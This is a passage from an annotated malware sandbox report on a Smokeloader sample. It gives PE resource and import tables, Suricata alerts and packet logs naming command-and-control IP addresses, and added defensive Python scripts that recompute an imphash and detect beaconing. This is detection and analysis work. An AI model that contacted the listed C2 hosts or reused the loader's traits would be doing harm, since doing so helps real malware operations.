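        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), vaddr,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += _align(len(data), SECTION_ALIGN)
    header = dos + b"PE\0\0" + coff + optional + table
    return header.ljust(headers_len, b"\0") + body


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for encrypted code (SHA-256 chain) so the demo is reproducible."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def demo_sections() -> list:
    """Constructed image: encrypted-looking .text, sparse .data, and a writable+executable stub."""
    return parse_sections(build_pe([
        (b".text", pseudo_random(8192), IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".data", b"\0" * 2000 + b"constructed data section\0" + b"\0" * 23,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b".stub", b"\x90" * 256,
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]))
```

The entropy figure alone does not prove packing (compressed resources and embedded certificates score high too), which is why the flag is tied to the EXECUTE characteristic; the report's .rsrc at 5.02 would not trip it. Raw bytes are scored over SizeOfRawData, as the report does, so file-alignment padding pulls the figure down slightly for small sections.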
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
XUBONAVEGUCIZAKUFAMABAWADUJATA | 0x65130 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | India | 0.5879156423858196
XUBONAVEGUCIZAKUFAMABAWADUJATA | 0x65130 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | Sri Lanka | 0.5879156423858196
RT_CURSOR | 0x66fc0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968
RT_CURSOR | 0x67e68 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196
RT_CURSOR | 0x68710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579
RT_CURSOR | 0x68ca8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375
RT_CURSOR | 0x68dd8 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635
RT_CURSOR | 0x68eb0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.27238805970149255
RT_CURSOR | 0x69d58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.375
RT_CURSOR | 0x6a600 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5057803468208093
RT_CURSOR | 0x6ab98 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755
RT_CURSOR | 0x6ba40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018
RT_CURSOR | 0x6c2e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751
RT_ICON | 0x5b7f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5351382488479263
RT_ICON | 0x5b7f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5351382488479263
RT_ICON | 0x5beb8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.41151452282157674
RT_ICON | 0x5beb8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.41151452282157674
RT_ICON | 0x5e460 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.44680851063829785
RT_ICON | 0x5e460 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.44680851063829785
RT_ICON | 0x5e8f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.36886993603411516
RT_ICON | 0x5e8f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.36886993603411516
RT_ICON | 0x5f7a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5130866425992779
RT_ICON | 0x5f7a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5130866425992779
RT_ICON | 0x60048 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.5841013824884793
RT_ICON | 0x60048 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.5841013824884793
RT_ICON | 0x60710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6502890173410405
RT_ICON | 0x60710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6502890173410405
RT_ICON | 0x60c78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.462448132780083
RT_ICON | 0x60c78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.462448132780083
RT_ICON | 0x63220 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.475375234521576
RT_ICON | 0x63220 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.475375234521576
RT_ICON | 0x642c8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.45778688524590166
RT_ICON | 0x642c8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.45778688524590166
RT_ICON | 0x64c50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.5106382978723404
RT_ICON | 0x64c50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.5106382978723404
RT_DIALOG | 0x6cad8 | 0x58 | data | | | 0.8977272727272727
RT_STRING | 0x6cb30 | 0x374 | data | Tamil | India | 0.46945701357466063
RT_STRING | 0x6cb30 | 0x374 | data | Tamil | Sri Lanka | 0.46945701357466063
RT_STRING | 0x6cea8 | 0x2ae | data | Tamil | India | 0.478134110787172
RT_STRING | 0x6cea8 | 0x2ae | data | Tamil | Sri Lanka | 0.478134110787172
RT_STRING | 0x6d158 | 0x4e8 | data | Tamil | India | 0.4434713375796178
RT_STRING | 0x6d158 | 0x4e8 | data | Tamil | Sri Lanka | 0.4434713375796178
RT_STRING | 0x6d640 | 0x514 | data | Tamil | India | 0.4276923076923077
RT_STRING | 0x6d640 | 0x514 | data | Tamil | Sri Lanka | 0.4276923076923077
RT_ACCELERATOR | 0x66f68 | 0x58 | data | Tamil | India | 0.7954545454545454
RT_ACCELERATOR | 0x66f68 | 0x58 | data | Tamil | Sri Lanka | 0.7954545454545454
RT_GROUP_CURSOR | 0x68c78 | 0x30 | data | | | 0.9375
RT_GROUP_CURSOR | 0x68e88 | 0x22 | data | | | 1.0588235294117647
RT_GROUP_CURSOR | 0x6ab68 | 0x30 | data | | | 0.9375
RT_GROUP_CURSOR | 0x6c850 | 0x30 | data | | | 0.9375
RT_GROUP_ICON | 0x5e8c8 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x5e8c8 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_GROUP_ICON | 0x650b8 | 0x76 | data | Tamil | India | 0.6694915254237288
RT_GROUP_ICON | 0x650b8 | 0x76 | data | Tamil | Sri Lanka | 0.6694915254237288
RT_VERSION | 0x6c880 | 0x254 | data | | | 0.535234899328859
DLL | Import
KERNEL32.dll | GlobalCompact, CreateProcessW, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, ReadConsoleInputA, GetVersionExW, GetFileAttributesA, GlobalMemoryStatus, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, CommConfigDialogW, GetTimeFormatW, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
GDI32.dll | GetCharWidth32A
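The report's Import Hash above is derived from exactly this table, so it can be recomputed from it. The script below is an added example written for this page, not code from the report or from the pefile project: it implements the imphash convention (MD5 over "dll.function" entries, lowercased, DLL extension stripped, joined with commas in import-table order). Because the value depends only on the import list, samples produced by the same crypter with the same padded set of imports share an imphash even when every file hash differs, which is what makes it useful for clustering loaders. IMPORTS is the report's import table re-typed as data. Its imphash should equal the report's value (60292dd185c67d0ddd8dc10e8ecfb2bb) only if the order printed above is the import directory's order and nothing is imported by ordinal; the script cannot verify that, so the comparison is left to the reader rather than asserted. Ordinal imports are rendered as "ordN" here; the pefile implementation additionally maps known ordinals of a few DLLs back to names.

```python
# Added example (not from the Joe Sandbox report): recompute an import hash from an import list.
import hashlib

STRIPPED_EXTENSIONS = ("dll", "ocx", "sys")   # extensions the imphash convention drops from DLL names

# The report's KERNEL32.dll import list, re-typed in the order shown in the table above.
KERNEL32_TEXT = """
GlobalCompact, CreateProcessW, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW,
CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, GetTickCount,
GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, TlsSetValue,
GetEnvironmentStrings, SetFileShortNameW, ReadConsoleInputA, GetVersionExW, GetFileAttributesA,
GlobalMemoryStatus, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange,
GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA,
SetFileAttributesA, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA,
GetCurrentDirectoryA, OpenEventW, LCMapStringW, CommConfigDialogW, GetTimeFormatW, GetTempFileNameW,
HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection,
EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess,
WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, UnhandledExceptionFilter,
SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW,
GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree,
GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId,
GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo,
GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, LCMapStringA,
MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers,
SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
"""
KERNEL32 = [n.strip() for n in KERNEL32_TEXT.replace("\n", " ").split(",") if n.strip()]

# (dll, function) pairs in import-table order; an int instead of a name means an ordinal import.
IMPORTS = [("KERNEL32.dll", f) for f in KERNEL32] + [("GDI32.dll", "GetCharWidth32A")]


def _normalize_dll(name: str) -> str:
    """Lowercase the module name and drop a .dll/.ocx/.sys extension, as the imphash convention does."""
    name = name.lower()
    base, dot, ext = name.rpartition(".")
    return base if dot and ext in STRIPPED_EXTENSIONS else name


def imphash_input(imports) -> str:
    """The comma-joined 'dll.function' string that gets hashed; exposed so the order is inspectable."""
    parts = []
    for dll, func in imports:
        fname = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{_normalize_dll(dll)}.{fname}")
    return ",".join(parts)


def imphash(imports) -> str:
    """MD5 of the normalized import string; compare against the report's 'Import Hash' field."""
    return hashlib.md5(imphash_input(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(len(IMPORTS), "imports ->", imphash(IMPORTS))
```

The ordering sensitivity is deliberate: swapping two entries changes the hash, so a crypter that emits its junk imports (GlobalCompact, SetVolumeMountPointW, CommConfigDialogW and the like) in a fixed template order will stamp every build with the same value, which is the property a hunting rule keys on. The real API set used at run time is resolved through GetProcAddress/LoadLibraryA and never appears in this table.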
Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T18:37:39.640493+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49736 | 189.164.127.217 | 80 | TCP
2024-10-24T18:38:58.525736+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50003 | 189.164.127.217 | 80 | TCP
2024-10-24T18:39:12.106292+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50004 | 189.164.127.217 | 80 | TCP
2024-10-24T18:39:31.867272+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 53258 | 189.164.127.217 | 80 | TCP
2024-10-24T18:39:51.793152+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 58682 | 189.164.127.217 | 80 | TCP
2024-10-24T18:40:12.354239+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 58683 | 201.124.145.196 | 80 | TCP
2024-10-24T18:40:27.315155+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 58684 | 201.124.145.196 | 80 | TCP
2024-10-24T18:40:45.531760+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 58685 | 201.124.145.196 | 80 | TCP
2024-10-24T18:41:03.377372+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 58686 | 201.124.145.196 | 80 | TCP
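Read as a sequence rather than as nine isolated hits, the alert table shows the behaviour a detection engineer wants to key on: the same source host sends a POST to one destination roughly every 20 seconds, then moves to a second destination and keeps the same cadence. The script below is an added example written for this page, not code from the report or from Suricata: it groups the alerts by destination, measures the gap between consecutive POSTs, calls a destination timer-driven when most gaps cluster around the median, and lists the C2 hosts in the order they were first contacted together with the hand-over gap between them. ALERT_ROWS is the report's own alert table re-typed as pipe-delimited text so the script runs offline; MIN_HITS and MAX_JITTER are assumed thresholds chosen for illustration.

```python
# Added example (not from the Joe Sandbox report): check-in timing over the Suricata alert rows above.
from collections import defaultdict
from datetime import datetime
from statistics import median

# The report's alert table, re-typed as constructed pipe-delimited input (same values as shown above).
ALERT_ROWS = """\
2024-10-24T18:37:39.640493+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|49736|189.164.127.217|80|TCP
2024-10-24T18:38:58.525736+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|50003|189.164.127.217|80|TCP
2024-10-24T18:39:12.106292+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|50004|189.164.127.217|80|TCP
2024-10-24T18:39:31.867272+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|53258|189.164.127.217|80|TCP
2024-10-24T18:39:51.793152+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|58682|189.164.127.217|80|TCP
2024-10-24T18:40:12.354239+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|58683|201.124.145.196|80|TCP
2024-10-24T18:40:27.315155+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|58684|201.124.145.196|80|TCP
2024-10-24T18:40:45.531760+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|58685|201.124.145.196|80|TCP
2024-10-24T18:41:03.377372+0200|2039103|ET MALWARE Suspected Smokeloader Activity (POST)|1|192.168.2.4|58686|201.124.145.196|80|TCP
"""

MIN_HITS = 3      # assumption: fewer check-ins than this is too little to call a timer
MAX_JITTER = 0.5  # assumption: a gap counts as regular when within +/-50% of the median gap


def parse_alerts(text: str) -> list:
    """Parse pipe-delimited alert rows into dicts, sorted by timestamp (timezone-aware)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = line.split("|")
        rows.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                     "sid": int(sid), "signature": sig, "severity": int(sev),
                     "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto})
    rows.sort(key=lambda r: r["ts"])
    return rows


def beacon_profile(rows: list) -> dict:
    """Per (dst, dport): hit count, inter-hit gaps, median gap and a periodicity verdict."""
    stamps = defaultdict(list)
    for r in rows:
        stamps[(r["dst"], r["dport"])].append(r["ts"])
    profile = {}
    for key, times in stamps.items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps) if gaps else None
        regular = [g for g in gaps if med is not None and abs(g - med) <= MAX_JITTER * med]
        # One outlier is tolerated so that a single long gap (the 79 s one here) does not
        # hide an otherwise steady timer.
        periodic = len(times) >= MIN_HITS and len(regular) >= len(gaps) - 1
        profile[key] = {"hits": len(times), "gaps": gaps, "median_gap": med,
                        "regular_gaps": len(regular), "periodic": periodic}
    return profile


def c2_order(rows: list) -> list:
    """Destination hosts in the order first contacted: the bot walking down its C2 list."""
    seen = []
    for r in rows:
        if r["dst"] not in seen:
            seen.append(r["dst"])
    return seen


def handover_gap(rows: list) -> float:
    """Seconds between the last POST to the first C2 host and the first POST to the next one."""
    order = c2_order(rows)
    if len(order) < 2:
        return 0.0
    last_to_first = max(r["ts"] for r in rows if r["dst"] == order[0])
    first_to_second = min(r["ts"] for r in rows if r["dst"] == order[1])
    return (first_to_second - last_to_first).total_seconds()


if __name__ == "__main__":
    alerts = parse_alerts(ALERT_ROWS)
    for (dst, port), p in beacon_profile(alerts).items():
        print(f"{dst}:{port} hits={p['hits']} median_gap={p['median_gap']:.1f}s periodic={p['periodic']}")
    print("C2 order:", " -> ".join(c2_order(alerts)), f"(hand-over after {handover_gap(alerts):.1f}s)")
```

Two details matter when this is turned into a rule. The source port changes on every POST while the destination and port stay fixed, so the grouping key must be the destination tuple, not the flow. And the hand-over gap (about 20.6 s here) equals the normal check-in interval, which means the move to 201.124.145.196 is the same timer firing against the next configured host rather than a separate infection; a rule that resets its state per destination would see two short bursts instead of one beacon.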
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 18:37:38.809153080 CEST | 49736 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:37:38.814568996 CEST | 80 | 49736 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:37:38.814672947 CEST | 49736 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:37:38.814829111 CEST | 49736 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:37:38.814851046 CEST | 49736 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:37:38.820297956 CEST | 80 | 49736 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:37:38.820322990 CEST | 80 | 49736 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:37:39.640352011 CEST | 80 | 49736 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:37:39.640492916 CEST | 49736 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:37:39.646840096 CEST | 49736 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:37:39.652280092 CEST | 80 | 49736 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:38:57.702812910 CEST | 50003 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:38:57.708116055 CEST | 80 | 50003 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:38:57.708194971 CEST | 50003 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:38:57.708359957 CEST | 50003 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:38:57.708403111 CEST | 50003 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:38:57.713778019 CEST | 80 | 50003 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:38:57.713787079 CEST | 80 | 50003 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:38:58.525589943 CEST | 80 | 50003 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:38:58.525736094 CEST | 50003 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:38:58.525759935 CEST | 50003 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:38:58.531079054 CEST | 80 | 50003 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:11.292944908 CEST | 50004 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:11.298408985 CEST | 80 | 50004 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:11.298485041 CEST | 50004 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:11.298638105 CEST | 50004 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:11.298665047 CEST | 50004 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:11.303926945 CEST | 80 | 50004 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:11.303936958 CEST | 80 | 50004 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:12.104166985 CEST | 80 | 50004 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:12.106292009 CEST | 50004 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:12.106292963 CEST | 50004 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:12.111700058 CEST | 80 | 50004 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:31.052088976 CEST | 53258 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:31.057555914 CEST | 80 | 53258 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:31.057660103 CEST | 53258 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:31.057832003 CEST | 53258 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:31.057862043 CEST | 53258 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:31.063290119 CEST | 80 | 53258 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:31.063405991 CEST | 80 | 53258 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:31.867206097 CEST | 80 | 53258 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:31.867271900 CEST | 53258 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:31.867327929 CEST | 53258 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:31.873389959 CEST | 80 | 53258 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:50.970066071 CEST | 58682 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:50.976711988 CEST | 80 | 58682 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:50.976787090 CEST | 58682 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:50.976933956 CEST | 58682 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:50.976965904 CEST | 58682 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:50.982501030 CEST | 80 | 58682 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:50.983058929 CEST | 80 | 58682 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:51.793059111 CEST | 80 | 58682 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:39:51.793152094 CEST | 58682 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:51.793653011 CEST | 58682 | 80 | 192.168.2.4 | 189.164.127.217
Oct 24, 2024 18:39:51.799093008 CEST | 80 | 58682 | 189.164.127.217 | 192.168.2.4
Oct 24, 2024 18:40:11.614111900 CEST | 58683 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:11.619623899 CEST | 80 | 58683 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:11.619712114 CEST | 58683 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:11.621645927 CEST | 58683 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:11.621646881 CEST | 58683 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:11.627052069 CEST | 80 | 58683 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:11.627221107 CEST | 80 | 58683 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:12.353992939 CEST | 80 | 58683 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:12.354238987 CEST | 58683 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:12.354238987 CEST | 58683 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:12.359880924 CEST | 80 | 58683 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:26.488370895 CEST | 58684 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:26.494388103 CEST | 80 | 58684 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:26.494493961 CEST | 58684 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:26.494584084 CEST | 58684 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:26.494601011 CEST | 58684 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:26.499955893 CEST | 80 | 58684 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:26.500116110 CEST | 80 | 58684 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:27.315067053 CEST | 80 | 58684 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:27.315155029 CEST | 58684 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:27.315222025 CEST | 58684 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:27.320749044 CEST | 80 | 58684 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:44.707995892 CEST | 58685 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:44.713737011 CEST | 80 | 58685 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:44.713851929 CEST | 58685 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:44.713968992 CEST | 58685 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:44.714004040 CEST | 58685 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:44.719439983 CEST | 80 | 58685 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:44.719499111 CEST | 80 | 58685 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:45.531666994 CEST | 80 | 58685 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:40:45.531759977 CEST | 58685 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:40:45.533857107 CEST | 58685 | 80 | 192.168.2.4 | 201.124.145.196
